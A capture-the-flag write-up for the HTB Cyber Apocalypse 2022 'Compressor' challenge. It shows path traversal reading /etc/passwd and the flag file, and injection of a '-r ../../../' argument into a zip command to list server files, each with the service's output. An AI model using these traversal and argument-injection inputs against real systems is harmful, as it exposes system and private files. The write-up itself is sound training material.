Tags: misc 

Rating:

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/compressor/1.png)

So we are given an endpoint we can `netcat` into and it presents us with the following:

```shell
Compressor
[*] Directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB
Component List:
+===============+
| |
| 1. Head ? |
| 2. Torso ? |
| 3. Hands ? |
| 4. Legs ? |
| |
+===============+
[*] Choose component: 1
[*] Sub-directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB/Head
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
```

Let's try reading an artifact and passing it something they didn't intend

```shell
[*] Choose action: 3
Insert name you want to read: ../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
ctf:x:1000:1000:1000:/home/ctf:/bin/sh
```

Great, so we can read arbitrary files!

```shell
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit

[*] Choose action: 1
Insert name: ../
Insert content: #!/bin/bash
Traceback (most recent call last):
File "/home/ctf/artifacts.py", line 104, in
create_file()
File "/home/ctf/artifacts.py", line 74, in create_file
f = open(fname, "a")
IsADirectoryError: [Errno 21] Is a directory: '../'
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
```

So first thought after this was since we can access filepaths seemingly indiscriminately, lets trying zipping them all up together

```shell
[*] Choose action: 4
Insert .zip: test.zip
Insert : test
Insert : -r ../../../
adding: test (stored 0%)
adding: ../../../ (stored 0%)
adding: ../../../ctf/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Head/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Hands/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Torso/ (stored 0%)
...
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Torso/ (stored 0%)
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Legs/ (stored 0%)
adding: ../../../ctf/artifacts.py (deflated 63%)
adding: ../../../ctf/clear.py (deflated 32%)
adding: ../../../ctf/flag.txt (stored 0%)
Actions:
```

and since it pastes the output we now know where the flag is!

```shell
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit

[*] Choose action: 3
Insert name you want to read: ../../../ctf/flag.txt
HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}
```

`Flag: HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}`

Original writeup (https://newyork167.github.io/infosec/cyber%20apocalypse%202022/misc/2022/05/19/cyber-apocalypse-2022-writeups-misc-compressor.html).